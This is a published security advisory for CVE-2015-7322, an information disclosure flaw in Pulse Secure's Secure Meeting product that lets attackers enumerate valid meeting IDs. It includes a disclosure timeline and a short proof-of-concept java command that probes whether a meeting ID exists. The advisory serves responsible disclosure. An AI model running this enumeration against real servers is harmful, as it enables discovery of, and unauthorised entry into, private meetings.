Profundis Labs - Security Advisory Vulnerablity Title ================== Secure Meeting (Pulse Collaboration) information disclosure vulnerability (CVE-2015-7322) Vendor: ======= Pulse Secure, LLC (www.pulsesecure.net) Product: ======== Junos Pulse Collaboration Secure Meeting Secure Meeting is a part of the Junos Puls software, which allows you to organize and holding virtual meetings with internal and external users via the Juniper Access Gateway. Affected Versions: ================== 8.0.5 and below Vulnerability Type: =================== Information Leakage CVE Reference: ============== CVE-2015-7322 VENDOR Reference: ================= https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40053 Vulnerability Details: ====================== It is possible to obtain valid meeting ids. It is possible to systematically try possible meeting IDs. Regarding the response of the web server the user can get knowledge, if the meeting ID exists and/or is still valid PoC code(s): ============ Example how to use the java fat client to check wether a meeting id exists or not: java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type 0 Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url=" uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid "DSID=PARAM_C" PARAM_A = meeting ID PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server PARAM_C = a valid sessionID PARAM_D = the domain/IP of the Junos Pulse server Depending on the validity of the meeting id, the server response is as followed: - The meeting that you are trying to join has ended - The meeting that you are trying to join does not exist - If the meeting id exists, the meeting client will join the meeting (due to CVE-2015-7323 it is possible to join protected meetings of other users) Disclosure Timeline: ==================== Vendor Notification: 01/2015 Vendor Confirmation: 03/2015 Vendor Patch Release: 06/2015 Public Disclosure: 09/2015 Severity Level: =============== CVSS Score: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) Description: ============ Request Method(s): [+] Proprietary Protocol Vulnerable Product: [+] Pulse Secure 8.0.5 Vulnerable Parameter(s): [+] meeting_id Authentication (Role): [+] User, Guest Access =========================================================== [+] Author: Philipp Rocholl [+] Website: https://www.profundis-labs.com [+] Source: https://profundis-labs.com/advisories/CVE-2015-7322.txt [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.